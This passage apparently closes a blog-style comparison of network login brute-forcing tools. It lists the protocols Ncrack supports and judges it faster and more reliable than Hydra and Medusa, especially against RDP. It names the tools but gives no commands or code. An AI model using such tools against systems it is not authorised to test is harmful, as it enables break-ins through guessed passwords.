Ncrack – RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet

There is much more that could be tested for a more comprehensive review. Other protocols, different targets, latency and Further tweaking of the scan speeds and threads.

While ncrack has limited protocol support compared to Hydra and Medusa the only conclusion for this little test; when it comes to speed, reliability and the ability to hit RDP services ncrack wins!!